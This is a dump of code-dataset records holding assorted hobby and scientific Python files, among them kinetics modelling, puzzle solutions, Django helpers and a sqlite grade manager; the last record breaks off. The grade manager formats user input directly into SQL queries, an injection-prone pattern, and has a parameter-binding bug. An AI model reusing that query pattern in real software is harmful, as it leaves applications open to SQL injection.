logging.warning('Music was unable to be loaded, generating stub functions')\n\n def play_random_song():\n pass\n\n def stop_music():\n pass\n","repo_name":"Gaming32/Tank-Game","sub_path":"tank_game/music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23543656054","text":"def element(queries):\n l = int(queries[0])\n r = int(queries[1])\n d = int(queries[2])\n \n if d < l or d > r:\n return d\n else:\n return (r//d + 1)*d\n\nsize = int(input())\n\nfor i in range(size):\n queries = input().split()\n elem = str(element(queries))\n print(elem)\n","repo_name":"sheyslong/codeforces","sub_path":"List 1/B - minimum-integer.py","file_name":"B - minimum-integer.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33320404685","text":"# Напишите программу для проверки истинности утверждения \n# ¬(X ⋁ Y ⋁ Z) = ¬X ⋀ ¬Y ⋀ ¬Z для всех значений предикат.\n\nprint('Проверям истинность выражения ¬(X ⋁ Y ⋁ Z) = ¬X ⋀ ¬Y ⋀ ¬Z при всех значениях:')\nfor i in range (2):\n X = True\n if i == 1:\n X = False\n for j in range (2):\n Y = True\n if j == 1:\n Y = False\n for d in range (2):\n Z = True\n if d == 1:\n Z = False\n print(f'X = {X}, Y = {Y}, Z = {Z}, то истинность выражения = {not(X or Y or Z) == (not X and not Y and not Z)}')\n","repo_name":"milawinner/tasksandprograms","sub_path":"Python/PythonSeminars/Hometask01/hometask2.py","file_name":"hometask2.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12914901282","text":"import markovify\nfrom corpus import Corpus\nimport re\nimport time\n\n\ndef get_training_text(corpus, from_paragraph, to_paragraph):\n \"\"\"\n This method takes a corpus object as parameter and extracts the sentences from the speeches in the corpus\n that will be used for training\n :param corpus:\n :param from_paragraph:\n :param to_paragraph:\n :return: training_text\n \"\"\"\n training_text = \"\"\n opening_par = []\n for key, speech in corpus.speeches.items():\n opening_par.append(speech.par[from_paragraph:to_paragraph])\n for par in opening_par:\n for sent in par:\n for chain in sent:\n clean_chain = [element for element in chain if element != u'\\u200b']\n clean_sentence = \" \".join(clean_chain)\n clean_sentence = re.sub(r' ([,:;\\.])',r'\\1', clean_sentence)\n training_text = clean_sentence + \" \" + training_text\n return training_text\n\ndef get_markovian_text(training_text, n):\n \"\"\"\n This method takes the training text and creates a concatenation of short and long automatically generated\n sentences in order to create a speech. The number of short and long alternations is parameter n.\n :param training_text:\n :param n:\n :return: markovian speech\n \"\"\"\n text_model = markovify.Text(training_text)\n my_string = \"\"\n for n in range(n):\n my_string = text_model.make_short_sentence(140, tries=200) + \" \" + text_model.make_sentence(tries=200) + \" \" + my_string\n return my_string\n\ndef save(markovian_speech):\n \"\"\"\n Saves the created speech inside the markovian_speeches folder\n :param markovian_speech:\n \"\"\"\n my_file = open('./markovian_speeches/speech' + \"_\" + str(time.time()) + '.txt', 'w', encoding='utf-8')\n my_file.write(markovian_speech)\n my_file.close()\n\nif __name__ == '__main__':\n \"\"\"\n This main method creates a corpus object with all the speeches. \n It then trains:\n - opening sentences using only the first two paragraphs.\n - body sentences using paragraphs from the second paragraph until the forth to last\n - ending sentences using four final paragraphs\n \n The automatic speech is then generated with the training material and saved as a file in the markovian_speeches folder.\n \"\"\"\n corpus = Corpus([])\n training_opening = get_training_text(corpus, 0, 2)\n training_body = get_training_text(corpus, 2, -4)\n training_end = get_training_text(corpus, -4, -1)\n\n markovian_speech = get_markovian_text(training_opening , 2) + \"\\n\\n\" + get_markovian_text(training_body , 6) + \"\\n\\n\" + get_markovian_text(training_end , 3)\n\n save(markovian_speech)\n\n\n\n","repo_name":"lirondos/orgulloysatisfaccion","sub_path":"markov.py","file_name":"markov.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"71093611361","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nfrom scipy.integrate import solve_ivp\nfrom scipy.optimize import root\n\nclass DistributiveDeadenylation():\n\n def __init__(self, fret_experiment):\n\n self.time = fret_experiment.time\n self.rna = fret_experiment.rna\n self.enzyme = fret_experiment.enzyme\n self.n = fret_experiment.n\n self.species_list()\n\n def species_list(self):\n\n species = ['E*','E'] # Binding incompetent and competent enzyme\n for x in range(1,self.n+1):\n species.append(f\"ETA{x}\") # RNA bound enzyme\n for x in range(1,self.n+1): # Must use a second loop because species is list not dict so order matters\n species.append(f\"TA{x}\") # Free RNA\n species.append('A1') # Free AMP arising from deadenylation\n self.species = species\n\n def setup_concentrations(self):\n\n self.concentrations = {}\n for specie in self.species:\n self.concentrations[specie] = []\n\n def initial_concentration_guesses(self, enzyme, rna, k1, km1, n):\n ## Make list of t=0 concentrations of enzyme and substrate.\n ## Should be all free enzyme, all full-length and free RNA substrate\n ## because no binding or cleavage has occurred yet.\n\n C0 = []\n C0.append((1/(1+(k1/km1)))*enzyme) # E*, initial guess is equilibrium concentration from E* <-> E with no added RNA\n C0.append(((k1/km1)/(1+(k1/km1)))*enzyme) # E\n for x in range(1,n+1): # ETAi, initially no bound complex\n C0.append(0)\n for x in range(1,n+1):\n if x == n: # TAi\n C0.append(rna) # Last element, initially all RNA is max length\n else:\n C0.append(0) # All other lengths are initially zero conc\n C0.append(0) # A1, initially zero\n\n self.C0 = C0\n\n @staticmethod\n def relaxation_matrix(C0, k1, km1, k2, km2, kcat, n):\n ## Relaxation matrix for nuclease activity, assumes just up to 3mer polyA strand length here as an example (n=3).\n ## Assumes that enzyme falls off RNA strand after catalysis and rebinds product to catalyze again,\n ## i.e. the enzyme is fully distributive. Also assumes that enzyme cannot catalyze anything below \n ## TA2 in length, i.e. once only 1 A is left, the enzyme cannot continue remove bases from the rest \n ## of the strand. This matrix can be extended for arbitrary length RNA, using the parameter n to set\n ## the initial RNA length prior to cleavage by the enzyme.\n\n ## d/dt C(t) = R * C(t)\n\n ## [E*] [-k1 k-1 0 0 0 0 0 0 0 ] [E*]\n ## [E] [k1 -k-1 k-2 k-2+kcat k-2+kcat -k2[E] -k2[E] -k2[E] 0 ] [E]\n ## d/dt [TEA1] = [0 0 -k-2 0 0 k2[E] 0 0 0 ] [TEA1]\n ## [TEA2] [0 0 0 -k-2-kcat 0 0 k2[E] 0 0 ] [TEA2]\n ## [TEA3] [0 0 0 0 -k-2-kcat 0 0 k2[E] 0 ] [TEA3]\n ## [TA1] [0 0 k-2 kcat 0 -k2[E] 0 0 0 ] [TA1]\n ## [TA2] [0 0 0 k-2 kcat 0 -k2[E] 0 0 ] [TA2]\n ## [TA3] [0 0 0 0 k-2 0 0 -k2[E] 0 ] [TA3]\n ## [A1] [0 0 0 kcat kcat 0 0 0 0 ] [A1] \n\n ## There are a total of 2*n + 3 species, so for the relaxation matrix R there are \n ## 2*n + 3 rows and columns, e.g. 1 E*, 1 E, 1 A1, n ETAi, and n TAi = 2*n + 3 total species.\n\n R = []\n R.append([-k1, km1] + [0]*n + [0]*n + [0]) # E*\n R.append([k1, -km1] + [km2] + [km2+kcat]*(n-1) + [-k2*C0[1]]*n + [0]) # E\n R.append([0]*2 + [-km2] + [0]*(n - 1) + [k2*C0[1]] + [0]*(n - 1) + [0]) # ETA1\n for y in range(2, n + 1): # ETA2 to ETAn\n R.append([0]*(y + 1) + [-km2-kcat] + [0]*(n - y) + [0]*(y - 1) + [k2*C0[1]] + [0]*(n - y) + [0])\n R.append([0]*2 + [km2] + [kcat] + [0]*(n - 2) + [-k2*C0[1]] + [0]*(n - 1) + [0]) # TA1\n for y in range(2, n): # TA2 to TAn-1\n R.append([0]*(y + 1) + [km2] + [kcat] + [0]*(n - 2) + [-k2*C0[1]] + [0]*(n - y) + [0])\n R.append([0]*2 + [0]*(n - 1) + [km2] + [0]*(n - 1) + [-k2*C0[1]] + [0]) # TAn\n R.append([0]*2 + [0] + [kcat]*(n - 1) + [0]*n + [0]) # A1\n\n return R\n\n def extract_solved_concentrations(self, solver_result):\n\n self.concentrations['E*'].append(solver_result.y[0])\n self.concentrations['E'].append(solver_result.y[1])\n for x in range(1,self.n+1): # Don't have to use two for loops because concentrations is dict not list\n self.concentrations[f\"ETA{x}\"].append(solver_result.y[x+1]) # x+1 to move past E* and E, ETAi are before TAi\n self.concentrations[f\"TA{x}\"].append(solver_result.y[x+self.n+1]) # x+n+1 because ETAi and TAi are separated by n indices\n self.concentrations['A1'].append(solver_result.y[-1]) # A1 is last\n \n def calculate_total_rna_concentrations(self):\n\n self.total_rna_concentrations = {k:[] for k in self.concentrations.keys() if 'E' not in k}\n for i, v in enumerate(self.enzyme):\n for j in range(1, self.n+1):\n self.total_rna_concentrations[f'TA{j}'].append(self.concentrations[f'TA{j}'][i] + self.concentrations[f'ETA{j}'][i]) # TAi,T = [TAi] + [ETAi]\n self.total_rna_concentrations['A1'].append(self.concentrations['A1'][i]) # TAi,T = [TAi] + [ETAi]\n\n def simulate_kinetics(self, params):\n ## Run numerical integration of rate equations for a given kinetic model from t=0, returns Ci(t)\n ## Needs initial guesses for concentrations of each species at t=0\n\n k1 = params['k1'].value\n km1 = params['km1'].value\n k2 = params['k2'].value\n km2 = params['km2'].value\n kcat = params['kcat'].value\n\n self.setup_concentrations()\n for i, v in enumerate(self.enzyme):\n if self.enzyme[i] == 0: # No enzyme means nothing happens, all RNA is full length at all times\n self.concentrations[f'E*'].append([0 for x in range(len(self.time[i]))])\n self.concentrations[f'E'].append([0 for x in range(len(self.time[i]))])\n self.concentrations[f'A1'].append([0 for x in range(len(self.time[i]))])\n\n for l in range(1, self.n+1):\n if l == self.n:\n self.concentrations[f'TA{self.n}'].append([self.rna for x in range(len(self.time[i]))])\n self.concentrations[f'ETA{self.n}'].append([0 for x in range(len(self.time[i]))])\n else:\n self.concentrations[f'TA{l}'].append([0 for x in range(len(self.time[i]))])\n self.concentrations[f'ETA{l}'].append([0 for x in range(len(self.time[i]))])\n\n else:\n self.initial_concentration_guesses(self.enzyme[i], self.rna, k1, km1, self.n)\n param_args = {'k1':k1, 'km1':km1, 'k2':k2, 'km2':km2, 'kcat':kcat, 'n':self.n}\n time_span = (self.time[i][0],self.time[i][-1])\n initial_concs = self.C0\n rate_func = self.relaxation_matrix\n t_return = np.array(self.time[i])\n solver_result = solve_ivp(propagator,time_span,initial_concs,t_eval=t_return,method='BDF',first_step=1e-12,atol=1e-12,args=(rate_func, param_args))\n self.extract_solved_concentrations(solver_result)\n\nclass DuplexHybridization:\n\n def __init__(self, fret_experiment):\n\n self.experimental_fret = fret_experiment.fret # Needed for solving baseline params with Ax = B\n self.fret_error = fret_experiment.fret_error\n self.dGo = fret_experiment.dGo\n self.alpha = fret_experiment.alpha\n self.n = fret_experiment.n\n self.temperature = fret_experiment.temperature\n self.time = fret_experiment.time\n self.QT = fret_experiment.QT\n self.enzyme = fret_experiment.enzyme\n self.rna = fret_experiment.rna\n self.species_list()\n self.initial_concentration_guesses()\n self.calculate_kq()\n\n def species_list(self):\n\n species = []\n for x in range(1,self.n+1):\n species.append(f'TA{x}') # Free RNA\n for x in range(1,self.n+1):\n species.append(f'TA{x}Q') # RNA hybridized to DNA quencher strand\n species.append('Q') # Free quencher strand\n self.species = species\n\n def setup_concentrations(self):\n\n self.concentrations = {}\n for specie in self.species:\n self.concentrations[specie] = [[] for concentration in self.enzyme]\n \n self.annealed_fraction =[[] for x in self.enzyme]\n\n def initial_concentration_guesses(self):\n \n self.C0= []\n for x in range(self.n):\n self.C0.append(1e-7) # [TAi], free RNA\n for x in range(self.n):\n self.C0.append(1e-7) # [TAiQ], RNA annealed to DNA quencher strand\n self.C0.append(self.QT) # [Q], free DNA quencher\n\n def get_total_rna_concentrations(self, prior_to_hybridization_concentrations):\n\n self.total_concentrations = [prior_to_hybridization_concentrations[f'TA{x}'] + prior_to_hybridization_concentrations[f'ETA{x}'] for x in range(1,self.n+1)] # TAi,T = [TAi] + [ETAi]\n\n def calculate_kq(self):\n\n i = np.array([I for I in np.arange(1,self.n+1)])\n dG = self.dGo + self.alpha*i # dG for forming hybrid RNA:DNA duplex as function of RNA length\n R = 8.3145e-3 # units of kJ/mol for dG, change to 1.987e-3 if you like kcal/mol but then also need to change dGo and alpha inputs to kcal/mol\n self.KQ = np.exp(-dG/(R*self.temperature))\n\n @staticmethod\n def hybrid_duplex_equations(C0, n, QT, TAiT, KQ):\n ## This takes the concentrations of each RNA species at each time point and calculates how much\n ## of each becomes annealed to the capture strand Q according to the affinity constant KQ.\n ## Essentially, this calculates the concentrations of a series of hybrid duplexes over time,\n ## once the deadenylation reaction is quenched and capture strand is added to probe the FRET value.\n\n eqs = []\n eqs.append(-QT + np.sum(C0[n:])) # 0 = -QT + [Q] + [TA1Q] + ... + [TAnQ], mass conservation DNA quencher\n for x in range(n):\n eqs.append(-TAiT[x] + C0[x] + C0[x+n]) # 0 = -TAiT + [TAi] + [TAiQ], mass conservation each RNA length\n for x in range(n):\n eqs.append(KQ[x]*C0[x]*C0[-1] - C0[x+n]) # KQi*[TAi]*[Q] - [TAiQ] = 0, affinity constant of each hybrid duplex\n\n return eqs\n\n def extract_solved_concentrations(self, solver_result, ei):\n\n for index, value in enumerate(self.concentrations.keys()):\n self.concentrations[value][ei].append(solver_result.x[index])\n\n def generate_baseline_matrix(self):\n\n self.baseline_matrix =[[] for x in self.enzyme]\n for i, v in enumerate(self.enzyme):\n for fraction in self.annealed_fraction[i]:\n self.baseline_matrix[i].append([fraction, 1])\n\n def solve_fret_baseline_params(self):\n # Baseline parameters are solved according to Ax = B, where A is a matrix with rows = [Pi, 1], and Pi is the ith annealed fraction time point 1 is a factor accounting for the baseline offset.\n # B is the experimental FRET data vector for a given enzyme concentration, and x is a vector of baseline parameters for that enzyme concentration, i.e. dF and F. Each enzyme conc has a unique dF and F.\n # The result of Ax = B maps the simulated hybridized RNA populations onto the experimental data using the optimal baseline parameters in x.\n\n self.baseline_params =[[] for x in self.enzyme]\n for i, v in enumerate(self.enzyme):\n baseline_solutions = np.linalg.lstsq(self.baseline_matrix[i][1:], self.experimental_fret[i][1:], rcond=None) # Don't use time zero dummy point for calculating baselines\n self.baseline_params[i].append([baseline_solutions[0][0]])\n self.baseline_params[i].append([baseline_solutions[0][1]])\n\n def calculate_fret(self):\n ## FRET curve starts high and ends low as full length RNA is converted to\n ## shorter RNA products which have weaker affinities for the capture strand\n ## denoted by Q, thus they cannot form stable hybrid RNA:DNA duplexes that\n ## would otherwise give rise to high FRET due to the proximity of the donor\n ## and acceptor dyes.\n\n self.fret = [[] for x in self.enzyme]\n for i, v in enumerate(self.enzyme):\n fret_column_vector = np.matmul(self.baseline_matrix[i][1:], self.baseline_params[i]) # Don't use time zero dummy point for calculating simulated FRET\n self.fret[i] = np.ravel(np.reshape(fret_column_vector, (1, len(fret_column_vector))))\n self.fret[i] = np.insert(self.fret[i], 0, 0) # Put time zero dummy point back in to make simulated FRET the same length as the experimental\n\n def normalize_fret(self): # Normalize FRET profiles to run from 1 to 0\n\n self.normalized_experimental_fret = []\n self.normalized_fret = []\n self.normalized_fret_error = []\n for i, v in enumerate(self.enzyme):\n self.normalized_fret.append((self.fret[i] - self.baseline_params[i][1])/self.baseline_params[i][0])\n self.normalized_experimental_fret.append((self.experimental_fret[i] - self.baseline_params[i][1])/self.baseline_params[i][0])\n self.normalized_fret_error.append(np.sqrt((self.fret_error[i]/self.baseline_params[i][0])**2))\n\n def simulate_hybridization(self, kinetic_model):\n ## Solve for concentrations of free and hybridized RNA after stopping reaction and adding quencher DNA strand\n ## Needs initial guesses for concentrations as in the kinetic part\n\n self.setup_concentrations()\n for i, v in enumerate(kinetic_model.enzyme):\n for z,t in enumerate(kinetic_model.time[i]):\n self.get_total_rna_concentrations({k:kinetic_model.concentrations[k][i][z] for k in kinetic_model.concentrations.keys()})\n solver_result = root(self.hybrid_duplex_equations, self.C0, args=(self.n, self.QT, self.total_concentrations, self.KQ), method='lm')\n self.extract_solved_concentrations(solver_result, i) # Need enzyme index to extend concentration list for each enzyme concentration\n self.annealed_fraction[i].append(np.sum([self.concentrations[k][i][z]/self.rna for k in self.concentrations if ('Q' in k) & (k[0] != 'Q')])) # Want everything annealed to Q, i.e. TAiQ, but not free Q\n\ndef propagator(t, C, func, constants): # Used in scipy.integrate.solve_ivp, general propagation function for use by kinetic model objects\n\n R = func(C, **constants) # Make relaxation matrix\n\n return np.matmul(R,C) # Calculates concentration fluxes, d/dt C\n\ndef generate_model_objects(fret_experiment, fit_model):\n\n if fit_model == 'Distributive':\n kinetic_model = DistributiveDeadenylation(fret_experiment)\n \n hybridization_model = DuplexHybridization(fret_experiment)\n\n return kinetic_model, hybridization_model\n\ndef simulate_full_model(params, kinetic_model, hybridization_model):\n\n kinetic_model.simulate_kinetics(params)\n hybridization_model.simulate_hybridization(kinetic_model)\n hybridization_model.generate_baseline_matrix()\n hybridization_model.solve_fret_baseline_params()\n hybridization_model.calculate_fret()\n\n return kinetic_model, hybridization_model\n\ndef calculate_residuals_simulate_best_fit_data(fret_expts, opt_params, config_params, residuals):\n # Calculate fit residuals and simulate data over finely sampled experimental temperature range to generate smooth best fit data and population plots\n \n from copy import deepcopy\n best_kin_models = []\n best_hybr_models = []\n resid = []\n normalized_resid = []\n for i, fret_expt in enumerate(fret_expts):\n kinetic_model, hybridization_model = generate_model_objects(fret_expt, config_params['Modeling parameters']['Kinetic model'])\n kinetic_model, hybridization_model = simulate_full_model(opt_params[i], kinetic_model, hybridization_model)\n hybridization_model.normalize_fret()\n resid.append(residuals(fret_expt.fret, hybridization_model.fret))\n normalized_resid.append(residuals(hybridization_model.normalized_experimental_fret, hybridization_model.normalized_fret))\n\n max_time = max(np.array([max(time_vector) for time_vector in fret_expt.time])) # Re-simulate with finely sampled experimental time vectors\n sim_time = [np.linspace(0, max_time, 300) for time_vector in fret_expt.time]\n sim_fret_expt = deepcopy(fret_expt)\n sim_fret_expt.time = sim_time\n sim_kinetic_model, sim_hybridization_model = generate_model_objects(sim_fret_expt, config_params['Modeling parameters']['Kinetic model'])\n sim_kinetic_model.simulate_kinetics(opt_params[i])\n sim_hybridization_model.simulate_hybridization(sim_kinetic_model)\n sim_hybridization_model.baseline_params = hybridization_model.baseline_params # Copy best baseline params for simulating best fit data\n sim_hybridization_model.generate_baseline_matrix() # Don't recalculate baseline params because this was already done above with the optimal params and copied, just make new baseline matrix\n sim_hybridization_model.calculate_fret()\n sim_hybridization_model.normalize_fret()\n\n best_kin_models.append(sim_kinetic_model)\n best_hybr_models.append(sim_hybridization_model)\n\n return resid, normalized_resid, best_kin_models, best_hybr_models\n","repo_name":"robharkness/deadenylationkinetics","sub_path":"src/analysis/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":17805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34535967266","text":"import re\n\ndata = open(\"Day22.txt\", \"r\").read().split(\"\\n\")[2:]\nnodes = {}\n\nfor line in data:\n\tx, y, space, used = map(int, re.match(r\"/dev/grid/node-x(\\d+)-y(\\d+)\\s+(\\d+)T\\s+(\\d+)T\\s+(?:\\d+)T\\s+(?:\\d+)%\", line).groups())\n\tnodes[(x, y)] = (space, used)\n\ntotal = 0\nfor p1 in nodes:\n\tfor p2 in nodes:\n\t\tif p1 != p2 and 0 < nodes[p1][1] <= (nodes[p2][0] - nodes[p2][1]):\n\t\t\ttotal += 1\n\nmax_x = max(k[0] for k in nodes)\nmax_y = max(k[1] for k in nodes)\ndims = (max_x + 1, max_y + 1)\n\nprint(total)\n\nspace = []\nused = []\nfor y in range(dims[1]):\n\tspace_row = []\n\tused_row = []\n\tfor x in range(dims[0]):\n\t\tspace_row.append(nodes[(x, y)][0])\n\t\tused_row.append(nodes[(x, y)][1])\n\tspace.append(space_row)\n\tused.append(used_row)\n\nspace = tuple(map(tuple, space))\nused = tuple(map(tuple, used))\n\nzero = None\nfor x in range(dims[0]):\n\tfor y in range(dims[1]):\n\t\tif used[y][x] == 0:\n\t\t\tzero = (x, y)\n\t\t\tbreak\n\ntarget = (0, 0)\ntarget_data = (max_x, 0)\n\ndirs = ((-1, 0), (1, 0), (0, -1), (0, 1))\n\nfor y in range(dims[1]):\n\tfor x in range(dims[0]):\n\t\tprint(\" {}/{} \".format(used[y][x], space[y][x]), end=\"\")\n\tprint()\n\n\n","repo_name":"kevinmchung/AdventOfCode","sub_path":"2016/Day22/Day22.py","file_name":"Day22.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"34779285836","text":"# -*- coding: utf-8 -*-\nfrom datetime import datetime\nfrom functools import wraps\nfrom importlib import import_module\n\n\nfrom django.db.models.fields.related import ForeignKey\nForeignKey.__dump__ = lambda self: 'ForeignKey(%s.%s -> %s.%s)' % (self.model, self.attname, self.rel.to, self.rel.field_name)\n\nfrom django.db.models.sql.where import Constraint\nConstraint.__dump__ = lambda self: 'Constraint(%s.%s)' % (self.alias, self.col)\n\n\ndef obj_dump(obj, indent=0, seen=None):\n if seen is None:\n seen = set()\n result = []\n if obj is None or isinstance(obj, (str, int, long, float, bool, dict, set, datetime)) or callable(obj):\n result.append(repr(obj))\n elif isinstance(obj, unicode):\n result.append(\"u'\" + obj.encode('utf8') + \"'\")\n elif isinstance(obj, (list, tuple)) and not obj:\n result.append(repr(obj))\n elif hasattr(obj, '__dump__'):\n result.append(obj.__dump__())\n elif id(obj) in seen:\n result.append('')\n else:\n seen.add(id(obj))\n if isinstance(obj, (list, tuple)):\n result.append('[\\n' if isinstance(obj, list) else '(\\n')\n for item in obj:\n result.append('%s,' % obj_dump(item, indent=indent+4, seen=seen))\n result.append(']' if isinstance(obj, list) else ')')\n else:\n result.append(repr(obj) + '\\n')\n for attr, value in obj.__dict__.iteritems():\n result.append('%s: %s,' % (attr, obj_dump(value, indent=indent+4, seen=seen)))\n\n result = result[0] + \"\\n\".join(' ' * indent + i for i in result[1:])\n return result\n\n\ndef get_module_attr(path):\n \"\"\"\n Возвращает атрибут модуля, переданный в виде строки 'module.other.AttrName'.\n Удобно для получения класса по строке импорта.\n При отсутствии атрибута возвращает None.\n \"\"\"\n i = path.rfind('.')\n module, attr = path[:i], path[i+1:]\n try:\n mod = import_module(module)\n return getattr(mod, attr, None)\n except ImportError as e:\n return None\n\n\ndef cached_property(func):\n @property\n @wraps(func)\n def wrapper(self):\n attname = '_' + func.__name__\n if not hasattr(self, attname):\n setattr(self, attname, func(self))\n return getattr(self, attname)\n return wrapper\n\n\ndef get_or_none(cls, **cond):\n try:\n return cls.objects.get(**cond)\n except cls.DoesNotExist:\n return None\n","repo_name":"odino4ka49/ConfigUI","sub_path":"venv/lib/python2.7/site-packages/handy/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37772448841","text":"import __main__ as main\nfrom Helper.TimerLogger import CodeTimeLogging\nfileName = main.__file__\nfileName = fileName.split('\\\\')[-1]\n\nCodeTimeLogging(Flag='F', filename=fileName, Tag='Dynamic-Programing', Difficult='Medium')\n\nCNT = [0]\n\n\ndef treeTopology(n):\n dp = [0 for i in range(n + 1)]\n dp[0] = 1\n dp[1] = 1\n\n for i in range(2, n + 1):\n for j in range(0, i):\n CNT[0] += 1\n catlangNumber = i - j - 1\n dp[i] += dp[j] * dp[catlangNumber]\n print(dp)\n return dp[-1]\n\n\nn = 10\nprint(treeTopology(n))\nprint(f'cnt = {CNT}')\nCNTC = [0]\n\n\ndef treeTopologyCache(n, cache):\n\n if n in cache:\n return cache[n]\n total = 0\n for i in range(n):\n CNTC[0] += 1\n j = n - i - 1\n itotal = treeTopologyCache(i, cache)\n jtotal = treeTopologyCache(j, cache)\n\n total += itotal * jtotal\n\n cache[n] = total\n return total\n\n\nprint(treeTopologyCache(n, {0: 1}))\nprint(f'cntc = {CNTC}')\n","repo_name":"Omkar02/FAANG","sub_path":"DP_31_NumberOfBinaryTreeTopology.py","file_name":"DP_31_NumberOfBinaryTreeTopology.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"30587977943","text":"import socket\ndef mysend(s, msg):\n\ttotalsent = 0\n\twhile totalsent < len(msg):\n\t\tsent = s.send(bytes(msg[totalsent:],'UTF-8'))\n\t\tif sent == 0:\n\t\t\traise RuntimeError(\"socket connection broken\")\n\t\ttotalsent = totalsent + sent\n\ts.send(bytes(chr(0),'UTF-8'))\ndef a(MESSAGE):\n\tglobal data\n\tTCP_IP = '127.0.0.1'\n\tTCP_PORT = 5014\n\tBUFFER_SIZE = 1024*1024\n\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ts.connect((TCP_IP, TCP_PORT))\n\tmysend(s,MESSAGE)\n\tdata = s.recv(BUFFER_SIZE)\n\ts.close()\ndef gogogadjet(mes):\n\ta('o'+mes)\n\treturn str(data,'UTF-8')\ndef gogocre(nom,cible,description,date):\n\ta('e'+nom+'|'+cible+'|'+description+'|'+str(date))\ndef gogoReListe():\n\ta('l')\nif __name__=='__main__':\n\tdata=\"\"\n\ta(\"\"\"oaccueil.css\"\"\")\n\tprint(\"received data:\", data)","repo_name":"Gabriel-Desharnais/Presentateur-code-python","sub_path":"cgi/gogogadjet.py","file_name":"gogogadjet.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24174221701","text":"import sqlite3\n\nconn = sqlite3.connect(\"My_Grades.db\")\nc = conn.cursor()\n\n\ndef add_subject():\n while True:\n subject_name = input(\"[Enter the name of the new Subject]: \")\n try:\n c.execute(\"CREATE TABLE {} (grade text)\".format(subject_name))\n conn.commit()\n break\n except:\n print(\"[This subject already exists or you enter invalid name]\")\n\n\ndef add_grade():\n while True:\n subject_name = input(\"[Enter the name of the Subject]: \")\n c.execute(\"SELECT count(name) FROM sqlite_master WHERE type='table' AND name='{}'\".format(subject_name))\n if c.fetchone()[0] == 1:\n grade = input(\"[Enter the grade]: \")\n try:\n float(grade)\n c.execute(\"INSERT INTO {} VALUES (?)\".format(subject_name), grade)\n conn.commit()\n break\n except:\n print(\"[Invalid grade]\")\n break\n print(\"[Invalid Subject]\")\n\n\ndef view_grades():\n c.execute(\"SELECT name FROM sqlite_master WHERE type='table'\")\n subjects = list(map(lambda x: \"\".join(x), c.fetchall()))\n for i in subjects:\n c.execute(\"SELECT * FROM {}\".format(i))\n grades = list(map(lambda x: \"\".join(x), c.fetchall()))\n if len(grades) > 0:\n average = sum(list(map(lambda x: int(x), grades)))/len(grades)\n else:\n average = 0\n print(f\"[{i}]\" + \" \"*(15-len(i)) + \"({:.2f}) \".format(average) + \" \".join(grades))\n\n\ndef delete_subject():\n while True:\n subject_name = input(\"[Enter the name of the Subject you want to delete]: \")\n if subject_name == \"q\":\n break\n c.execute(\"SELECT count(name) FROM sqlite_master WHERE type='table' AND name='{}'\".format(subject_name))\n if c.fetchone()[0] == 1:\n while True:\n warning = input(\"[Are you sure you want to delete {}? (y/n)]: \".format(subject_name))\n if warning == \"y\":\n c.execute(\"DROP TABLE {}\".format(subject_name))\n conn.commit()\n print(f\"[{subject_name} deleted]\")\n break\n elif warning == \"n\":\n break\n else:\n print(\"[Invalid input]\")\n break\n else:\n print(\"[This Subject does not exist]\")\n\n\ndef delete_grade():\n while True:\n subject_name = input(\"[Enter the name of the Subject]: \")\n if subject_name == \"q\":\n break\n c.execute(\"SELECT count(name) FROM sqlite_master WHERE type='table' AND name='{}'\".format(subject_name))\n if c.fetchone()[0] == 1:\n c.execute(\"SELECT rowid, * FROM {}\".format(subject_name))\n grades = c.fetchall()\n while True:\n for i in grades:\n print(f\"[{i[0]}] {i[1]}\")\n grade_id = input(\"[Enter the [id] of the grade you want to delete]: \")\n try:\n c.execute(f\"SELECT * FROM {subject_name} WHERE rowid={grade_id}\")\n grade = \"\".join(c.fetchone())\n while True:\n warning = input(f\"[Are you sure you want to delete {grade} from {subject_name}? (y/n)]: \")\n if warning == \"y\":\n c.execute(f\"DELETE from {subject_name} WHERE rowid={grade_id}\")\n conn.commit()\n print(f\"[{grade} deleted from {subject_name}]\")\n break\n elif warning == \"n\":\n break\n else:\n print(\"[Invalid input]\")\n break\n except:\n print(\"[Invalid input]\")\n break\n else:\n print(f\"[{subject_name} does not exist]\")\n \n","repo_name":"FilipNeubauer/grade_manager","sub_path":"grades_manager.py","file_name":"grades_manager.py","file_ext":"py","file_size_in_byte":3934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7701248192","text":"import matplotlib.pyplot as plt\nimport numpy as np\nplt.rcParams['font.sans-serif'] = ['KaiTi', 'SimHei', 'FangSong'] # 汉字字体,优先使用楷体,如果找不到楷体,则使用黑体\nplt.rcParams['font.size'] = 12 # 字体大小\nplt.rcParams['axes.unicode_minus'] = False # 正常显示负号\n\nx = np.arange(-2, 2, 0.01)\n\ny = 2*np.sin(np.pi*x)*np.sin(np.pi*x/2) / (np.pi * np.pi * x *x)\n\nplt.title(\"一元二次函数\")\nplt.plot(x, y)\nplt.show()\n","repo_name":"zjuws/pyproject","sub_path":"math.py","file_name":"math.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21910853013","text":"from collections import 